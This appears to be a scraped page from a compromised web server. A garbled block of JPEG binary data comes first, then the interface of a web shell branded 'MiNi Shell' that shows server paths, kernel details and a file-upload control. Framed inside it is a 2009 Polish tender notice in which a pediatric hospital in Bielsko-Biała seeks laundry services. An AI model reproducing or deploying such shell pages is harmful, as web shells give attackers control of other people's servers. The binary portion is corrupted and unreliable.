JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090414/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090414/102580-N-2009.html

<p class="kh_header"><b>Bielsko-Biała: Wykonanie usług pralniczych dla potrzeb Szpitala Pediatrycznego w Bielsku-Białej</b><br>
<b>Numer ogłoszenia: 102580 - 2009; data zamieszczenia: 14.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Pediatryczny Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Sobieskiego 83, 43-300 Bielsko-Biała, woj. śląskie, tel. 033 8125004, 8284047, faks 033 8151630.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital_ped.glt.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usług pralniczych dla potrzeb Szpitala Pediatrycznego w Bielsku-Białej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonywanie usług pralniczych dla potrzeb Szpitala Pediatrycznego w ilości 2,5 do 3,5 ton miesięcznie, dla następującego asortymentu:
1. Bielizna pościelowa - bawełniana (biała i kolorowa).
2. Bielizna dziecięca bawełniana (biała i kolorowa).
3. Pieluchy tetrowe.
4. Podkłady, worki bieliźniarskie.
5. Ręczniki, obrusy, serwety, koce, firany, mopy, poduszki, kołdry, materace.
6. Kitle lekarskie, garsonki, spodnie - bawełniane z domieszką tworzywa sztucznego, i inne

Warunki graniczne wymagane od Wykonawców w zakresie wykonania przedmiotu zamówienia:
1. Pralnia, w której wykonywane będą usługi pralnicze musi posiadać opinię sanitarną wydaną przez Stację Sanitarno - Epidemiologiczną do wykonywania usług pralniczych pościeli i bielizny szpitalnej. 
2. Wykonawca do wykonania usługi będzie stosował środki piorące i wspomagające pranie dopuszczone przez P.Z.H., dezynfekujące bakterie, wirusy, grzyby, prątki gruźlicy (świadectwa dopuszczenia należy załączyć do oferty). Stosowane środki nie mogą powodować uszkodzenia materiału, a szczególnie znacznego odbarwienia.
3. Wykonawca zapewni transport oraz wyposażenie techniczne i kadrowe dla wykonania usługi w ilości 2500 kg do 3500 kg prania miesięcznie.
4. Odbiór i dostarczenie prania odbywać się będzie 6 razy w tygodniu od godz. 700 do 1400, a przerwa w odbiorze prania w dni świąteczne nie może przekroczyć 48 godzin. W przypadku dni świątecznych wolnych od pracy, trwających dłużej niż 2 dni Zamawiający zastrzega sobie możliwość dodatkowego wykonania usługi w danym dniu, tj. odbioru bielizny do prania dwa razy.
5. Wykonawca będzie pisemnie potwierdzał ilość kilogramów odebranego prania. Pieluchy Wykonawca rozliczy według ich wagi po wypraniu (suche). Potwierdzenie odbioru dokonywane będzie w magazynie Szpitala codziennie, na wykazie przygotowanym przez Zamawiającego i potwierdzane przez obie strony.
6. Transport bielizny odbywać się będzie na koszt i ryzyko Wykonawcy i tylko środkami przeznaczonymi do tego rodzaju transportu, posiadającymi opinię sanitarną Stacji Sanitarno - Epidemiologicznej.
7. Pościel nieoznakowaną lub nową Wykonawca odpowiednio oznakuje na własny koszt, po wcześniejszej akceptacji wzoru przez Zamawiającego.
8. Dostarczone, czyste pranie musi być odpowiednio zapakowane, zgodnie z podziałem na poszczególne oddziały Szpitala i zachowaniem segregacji asortymentowej
9. Zamawiający nie przyjmie prania, które nie będzie spełniało wymogów jakościowych - czyste, suche, złożone, odprasowane, usztywnione, odpowiednio zapakowane. 
W przypadku zakwestionowanej partii prania, Zamawiający nie będzie ponosił kosztów związanych z powtórnym praniem, koszty te obciążać będą Wykonawcę w ramach reklamacji.
10. Materiały zniszczone nie z winy Wykonawcy, należy na bieżąco potwierdzać odrębnym protokołem kasacyjnym, podpisanym przez obie strony umowy, nie później niż w 3 dni po wykonaniu usługi. Wykonawca zobowiązuje się naprawić materiały, które uległy zniszczeniu w trakcie eksploatacji                                (np. przyszycie guzików, zacerowanie dziur itp.)
11. Na wniosek Zamawiającego asortyment zniszczony z winy Wykonawcy zostanie przez niego odkupiony i dostarczony do Szpitala..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 98.31.12.00-8, 98.31.10.00-6, 98.31.50.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział Wykonawcy, którzy spełniają wymagane w art. 22 ust. 1 ustawy Prawo zamówień publicznych, tj.:
1. posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem  technicznym i osobami zdolnymi do wykonywania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
3. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4. nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy.
5. złożą ważną i odpowiednio przygotowaną - zgodnie z zapisami SIWZ - ofertę nie podlegającą odrzuceniu na podstawie art. 89.
Sposób dokonania oceny spełnienia wymaganych warunków:
- Ocena spełnienia określonych wyżej warunków zostanie dokonana na podstawie złożonych przez Wykonawcę dokumentów, w tym oświadczeń, określonych w dalszej treści SIWZ. 
- przy dokonaniu oceny spełnienia warunków Zamawiający będzie się kierował regułą: spełnia albo nie spełnia,
- niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem Wykonawcy z postępowania; 
- ofertę Wykonawcy wykluczonego uznaje się za odrzuconą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Od wykonawców ubiegających się o przyznanie zamówienia wymagane jest,  w celu potwierdzenia spełnienia  warunków, o których mowa w art. 22 ust. 1 ustawy,  przedstawienie dokumentów: 
1. Formularza ofertowego, przygotowanego według wzoru stanowiącego załącznik nr 1 do niniejszej specyfikacji.
2. Aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3. Pełnomocnictwa do reprezentowania Wykonawcy w postępowaniu o udzielenie zamówienia albo reprezentowania Wykonawcy w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego - udzielone osobom nie wymienionym w dokumencie, o którym mowa w pkt. 2, a reprezentującym Wykonawcę, w szczególności poprzez podpisywanie/uwierzytelnianie dokumentów składających się na ofertę oraz innych składanych w toku postępowania. Dodatkowo osoby umocowane winny złożyć oświadczenie, że ich pełnomocnictwo nie zostało do dnia sporządzenia oferty odwołane i nie wygasło,
4. Oświadczenia, że wykonawca spełnia wymagania art. 22 ust. 1 ustawy - wg wzoru stanowiącego załącznik nr 2 do SIWZ.
5. Zaświadczeń właściwego urzędu skarbowego oraz właściwego oddziału ZUS potwierdzających odpowiednio, że oferent nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert lub zaświadczeń, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie  w całości wykonania decyzji organu podatkowego. 
6. Informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt 4 - 9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, dotyczy także podmiotów zbiorowych.
7. Kserokopia Polisy ubezpieczeniowej od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.
8. Oświadczenie o zapoznaniu się i akceptacji warunków specyfikacji istotnych warunków zamówienia - wg wzoru stanowiącego załącznik nr 3 do SIWZ.
9. Oświadczenie gwarancyjne dot. wykonywania usługi - wg wzoru stanowiącego załącznik nr 4 do SIWZ.
10. Oświadczenie dot. sposobu wykonania usługi - technologii prania (załącznik nr 6 do SIWZ)
11. Aktualna opinia sanitarna Stacji Sanitarno - Epidemiologicznej, dopuszczająca wykonywanie usług pralniczych pościeli i bielizny szpitalnej. 
12. Aktualna opinia sanitarna Stacji Sanitarno - Epidemiologicznej, dotycząca środków transportu Wykonawcy do przewozu bielizny.
13. Świadectwa P.Z.H.,  dopuszczające środki piorąco - dezynfekujące do ich stosowania.
14. Wykaz wykonanych w okresie ostatnich trzech lat usług dla jednostek służby zdrowia, a jeżeli okres działalności jest krótszy - usług wykonanych w tym okresie, z podaniem ich wartości, wielkości - tzn. ilości kilogramów prania miesięcznie, dat wykonania oraz odbiorców, wraz z dokumentami potwierdzającymi należyte ich wykonanie.
15. Wykaz środków piorących i dezynfekujących jakich Wykonawca będzie używał do wykonania usługi.
16. Wykonawca może do oferty dołączyć inne dokumenty, które mogą wskazywać na jakość świadczonych przez niego usług. 

Dokumenty te mogą być przedstawione w formie oryginału albo kserokopii poświadczonej za zgodność z oryginałem przez wykonawcę. Informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, zastrzeżone wyłącznie do wiadomości Zamawiającego Wykonawca winien podać w odrębnej części oferty odpowiednio je zabezpieczając oraz opatrując dopiskiem -Tajemnica przedsiębiorstwa - informacje zastrzeżone do wyłącznej wiadomości Zamawiającego..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 0.80</li>
<li>2 - jakość sposobu świadczenia usługi - 0.20</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpital_ped.glt.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Pediatryczny ul. Sobieskiego 83, 43-300 Bielsko-Biała. budynek administracji - Zamówienia Publiczne.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.04.2009 godzina 10:00, miejsce: Szpital Pediatryczny ul. Sobieskiego 83, 43-300 Bielsko-Biała. budynek administracji - SEKRETARIAT.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com